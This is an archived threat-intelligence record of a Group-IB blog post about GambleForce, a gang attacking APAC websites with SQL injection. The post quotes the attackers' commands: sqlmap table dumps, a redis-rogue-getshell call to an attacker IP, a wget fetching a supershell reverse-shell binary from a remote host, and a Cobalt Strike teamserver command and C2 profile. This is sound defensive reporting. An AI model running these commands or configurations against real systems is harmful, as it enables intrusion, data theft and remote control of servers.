{ "id": "928b0106-1130-4776-9d8e-24fc1fc662bd", "created_at": "2026-04-06T00:22:33.676131Z", "updated_at": "2026-04-10T03:32:21.643049Z", "deleted_at": null, "sha1_hash": "000b7af5d96a2a706eee2e3a95ff571dbbb34d03", "title": "Exposing GambleForce, an SQL injection gang | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 115706, "plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nAce in the Hole: exposing\r\nGambleForce, an SQL injection\r\ngang\r\nAnalysis of TTPs tied to GambleForce, which carried out SQL injection attacks against companies in\r\nthe APAC region\r\nDecember 14, 2023 · min to read · Threat Intelligence\r\n← Blog\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 1 of 13\n\nGambleForce SQL injections Threat Intelligence\r\nIntroduction\r\nIn mid-September 2023, during routine monitoring of adversary infrastructure, Group-IB’s Threat\r\nIntelligence unit identified a command and control (C\u0026C) server that was hosting several tools.\r\nNotably, none were custom-made. The entire toolset was based on publicly available open-source\r\ninstruments used for pentesting purposes. After examining the toolset in more detail, it became clear\r\nthat the tools were most likely associated with a threat actor executing one of the oldest attack\r\nmethods: SQL injections.\r\nWhile delving deeper into the malicious infrastructure, Group-IB researchers identified the threat\r\nactor’s first targets, predominantly linked to the gambling industry. This prompted the Threat\r\nIntelligence unit to name the threat actor GambleForce (tracked under the name EagleStrike\r\nGambleForce in Group-IB’s Threat Intelligence Platform). Since it appeared in September 2023,\r\nGambleForce has targeted more than 20 websites (government, gambling, retail, and travel) in\r\nAustralia, China, Indonesia, the Philippines, India, South Korea, Thailand, and Brazil.\r\nDespite using very basic attack methods, the threat actor has managed to successfully attack six\r\ncompanies in Australia (travel), Indonesia (travel, retail), the Philippines (government), and\r\nSouth Korea (gambling), which shows just how vulnerable many organizations are against\r\nrudimentary but clearly dangerous SQL injection attacks.\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 2 of 13\n\nIn some instances, the attackers stopped after performing reconnaissance. In other cases, they\r\nsuccessfully extracted user databases containing logins and hashed passwords, along with lists of\r\ntables from accessible databases. Rather than looking for specific data, the threat actor attempts to\r\nexfiltrate any available piece of information within targeted databases, such as hashed and plain\r\ntext user credentials. What the group does with the stolen data remains unknown so far.\r\nAfter identifying GambleForce’s C\u0026C, Group-IB’s Threat Intelligence researchers shared this\r\ninformation with the company’s 24/7 Computer Emergency Response Team (CERT-GIB), which then\r\ntook down the cybercriminals’ command and control server. Nonetheless, we believe that\r\nGambleForce is most likely to regroup and rebuild their infrastructure before long and launch new\r\nattacks.\r\nWe have therefore written this blog post to describe the group’s tools and point out the relevant\r\nindicators of compromise (IoCs). The post also contains recommendations for corporate\r\ncybersecurity teams on how to better defend against SQL injection attacks.\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 3 of 13\n\nKey findings\r\nGambleForce’s toolset\r\nThe attackers used tools such as dirsearch, sqlmap, tinyproxy, redis-rogue-getshell without any\r\nunique modifications and keeping almost all default settings:\r\npython dirsearch.py -u [targetdomain]\r\npython redis-master.py -r [targetip] -p 6379 -L 212.60.5.129 -P 21000 -f RedisModulesSDK/e\r\nsqlmap -r /root/tools/1111.txt --technique=U -D [victimdatabasename] -T [victimtablename]\r\nsqlmap -r [victimdomainname].txt --dbms=mysql -D [victimdatabasename] -T tbl_content --dum\r\nSqlmap can be especially dangerous. In some cases, additional malware can be loaded into targeted\r\nservers, which allows for lateral movement. A notable example of this tactic was observed by Group-IB’s Threat Intelligence unit in an incident involving APT41. The attackers gained initial access using\r\nSQLmap, then proceeded to upload Cobalt Strike on compromised servers.\r\nInteresting features that we discovered on the attackers’ server include:\r\nGambleForce is a previously unknown threat actor involved in SQL injection attacks\r\nSince it appeared in September 2023, the group has targeted 24 websites (government,\r\ngambling, retail, travel, and job-seeking)\r\nThe group primarily focuses on the Asia-Pacific region: Australia, China, Indonesia,\r\nPhilippines, India, South Korea, Thailand\r\nGambleForce uses a set of publicly available open-source tools for pentesting: dirsearch, redis-rogue-getshell, Tinyproxy, sqlmap, and Cobalt Strike\r\nThe version of Cobalt Strike discovered on the gang’s server used commands in Chinese\r\nIn one attack in Brazil, the attackers exploited CVE-2023-23752, a vulnerability in Joomla CMS,\r\nbut they failed to exfiltrate any data\r\nGroup-IB took down the gang’s C\u0026C and sent notifications to the identified victims\r\nGroup-IB’s Threat Intelligence unit believes that the group may soon rebuild the infrastructure\r\nand we continue monitoring their activity\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 4 of 13\n\nThe attackers used this command 95 times out of nearly 750 commands executed on the server.\r\nSuch frequent use of the command could indicate that the devices used by the attackershave a\r\nlocale different from en_US and that the command was necessary to ensure that the entered\r\ncommands were accepted without errors.\r\nwget http://38.54.40[.]156:8888/supershell/compile/download/linuxamdx64 -O /var/tmp/.cache\r\nA tmux session was launched immediately after that, however, and we have no information about\r\nwhat the attackers did with the file next.\r\nUsing the following command on the attackers’ C\u0026C server:\r\nLoading a file from a remote source that hosted supershell – a Chinese-language framework with\r\na web interface for creating and managing reverse shells. We identified how the attackers used\r\nthe command:\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 5 of 13\n\nCobalt Strike\r\nGambleForce does not use default settings for Cobalt Strike. The attackers launch their malleable\r\nprofile, which contains the following C\u0026C domains:\r\nDns-supports[.]online\r\nWindows.updates[.]wiki\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 6 of 13\n\n./teamserver 212.60[.]5.129 qwertyuiop123 cs2.profile\r\nhttps-certificate {\r\n set keystore \"cs.store\";\r\n set password \"qwertyuiop123\";\r\n}\r\nhttp-stager {\r\n set uri_x86 \"/api/1\";\r\n set uri_x64 \"/api/2\";\r\n client {\r\n header \"Host\" \"www.dns-supports.online\";}\r\n server {\r\n output{\r\n print;\r\n }\r\n }\r\n }\r\nhttp-get {\r\n set uri \"/api/3\";\r\n client {\r\n header \"Host\" \"www.dns-supports[.]online\";\r\n metadata {\r\n base64;\r\n header \"Cookie\";\r\n }\r\n }\r\n server {\r\n output{\r\n print;\r\n }\r\n }\r\n }\r\nhttp-post {\r\n set uri \"/api/4\";\r\n client {\r\n header \"Host\" \"www.dns-supports[.]online\";\r\n id {\r\n uri-append;\r\n }\r\n output{\r\n print;\r\n }\r\n }\r\n server {\r\n output{\r\n print;\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 7 of 13\n\n}\r\n }\r\n}\r\nInterestingly, the version of Cobalt Strike discovered on the gang’s server used commands in\r\nChinese, but this fact alone is not enough to attribute the group’s origin.\r\nSource: Group-IB Graph Network Analysis Tool\r\nThe attackers also use Cobalt Strike with their self-signed SSL certificates for the teamserver and\r\nlisteners, which mimic “Microsec e-Szigno Root CA” and “Cloudflare”:\r\nkeytool -keystore CobaltStrikepro.store -storepass 123456 -keypass 123456 -genkey -keyalg\r\nThe attackers used the username nmgb and the following IP addresses to log into the operator\r\npanel:\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 8 of 13\n\nnmgb (37.128.246.50) joined\r\nnmgb (37.128.246.50) joined\r\nneo2323 (38.60.220.230) joined\r\nnmgb (37.128.246.50) joined\r\nsbsbsb22 (38.60.220.230) joined\r\nnmgb (130.162.156.51) joined\r\nnmgb (172.104.113.179) joined\r\nnmgb (172.104.113.179) joined\r\nnmgb (123.118.226.80) joined\r\nnmgb (123.118.226.80) joined\r\nnmgb (123.118.226.80) joined\r\nnmgb (172.104.51.37) joined\r\nnmgb (37.128.246.50) joined\r\nnmgb (37.128.246.50) joined\r\nnmgb (37.128.246.50) joined\r\nnmgb (37.128.246.50) joined\r\nnmgb (37.128.246.50) joined\r\nnmgb (37.128.246.50) joined\r\nMITRE ATT\u0026CK® as shown by the Group-IB Threat Intelligence\r\nplatform\r\nConclusion\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 9 of 13\n\nSQL attacks persist because they are simple by nature. Companies often overlook how critical input\r\nsecurity and data validation are, which leads to vulnerable coding practices, outdated software, and\r\nimproper database settings. The negligence creates the perfect landscape for SQL injection attacks\r\non public-facing web applications. As a result, companies remain susceptible to such attacks —\r\nbecause they fail to address fundamental flaws.\r\nAt the same time, web injections remain a major problem because they are difficult to detect.\r\nBusinesses should monitor their systems for any suspicious activity as web injections can often go\r\nundetected for a long time.\r\nPreventing web injection attacks requires a set of reliable measures, starting with identifying\r\ninjection flaws or injection vulnerabilities (weak spots in the company’s assets), manual code review,\r\nsecure coding practices, penetration testing, input validation, and patch management.\r\nRecommendations\r\nGroup-IB penetration testing services combine the manual work by experts with over 40 automated\r\ntools, using the latest methods and techniques collected by Group-IB Threat Intelligence. With over\r\na thousand successfully completed security assessment projects, we have the expertise and\r\nexperience to identify assets that are vulnerable to SQL-injection attacks.\r\nSQL injection attacks today are also facilitated by malicious bots. These automated processes\r\nenable threat actors to systematically identify and exploit vulnerabilities in a targeted system or\r\ndatabase. The consequence of such attacks extends to unauthorized access to databases,\r\npotentially leading to data theft and compromise.\r\nGroup-IB’s Fraud Protection solution adopts a proactive approach to address this evolving attack\r\ntechnique, its AI creates highly accurate user behavior profiles of your users and devices. Within a\r\nfew milliseconds, it distinguishes between genuine user interactions and activities generated by a\r\nthird party, such as a fraudster or a sophisticated bot.\r\nBy implementing these measures, Group-IB Fraud Protection aims to mitigate not only SQL injection\r\nvulnerabilities but also the risks generated by automated bot-driven attacks.\r\nFor comprehensive cyber protection, Group-IB Managed XDR is designed to detect and prevent\r\nvarious types of cyber threats, including ones that go unnoticed by other solutions. Our NTA\r\ntechnology, equipped with advanced network traffic analysis capabilities, uses its signatures, Group-https://www.group-ib.com/blog/gambleforce-gang/\r\nPage 10 of 13\n\nIB Threat Intelligence data, and machine learning technologies to provide unparalleled threat\r\ndetection and prevention.\r\nMXDR utilizes advanced behavioral analysis techniques to identify suspicious activities within the\r\nestablished network protocols. This can help organizations detect potential SQL injection attacks\r\nand other security threats.\r\nIn the event of any deviations from normal network activity, MXDR alerts the security teams and\r\nautomates incident response to mitigate the threat in real-time. The response actions can vary from\r\nisolating hosts, killing processes, getting console access for investigation, etc.\r\nNetwork indicators\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nDns-supports[.]online\r\nWindows.updates[.]wiki\r\n212.60.5[.]129\r\n38.54.40[.]156\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 11 of 13\n\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 12 of 13\n\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nhttps://www.group-ib.com/blog/gambleforce-gang/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://www.group-ib.com/blog/gambleforce-gang/" ], "report_names": [ "gambleforce-gang" ], "threat_actors": [ { "id": "8d1c3575-c954-4e39-8717-8d15ccd4020e", "created_at": "2024-01-18T02:02:34.725883Z", "updated_at": "2026-04-10T02:00:05.007755Z", "deleted_at": null, "main_name": "GambleForce", "aliases": [], "source_name": "ETDA:GambleForce", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Dirsearch", "Tinyproxy", "cobeacon", "redis-rogue-getshell", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "e55fb744-4fb6-4b73-a326-d4d014d6a3d7", "created_at": "2023-12-21T02:00:06.102133Z", "updated_at": "2026-04-10T02:00:03.503718Z", "deleted_at": null, "main_name": "GambleForce", "aliases": [], "source_name": "MISPGALAXY:GambleForce", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434953, "ts_updated_at": 1775791941, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/000b7af5d96a2a706eee2e3a95ff571dbbb34d03.pdf", "text": "https://archive.orkl.eu/000b7af5d96a2a706eee2e3a95ff571dbbb34d03.txt", "img": "https://archive.orkl.eu/000b7af5d96a2a706eee2e3a95ff571dbbb34d03.jpg" } }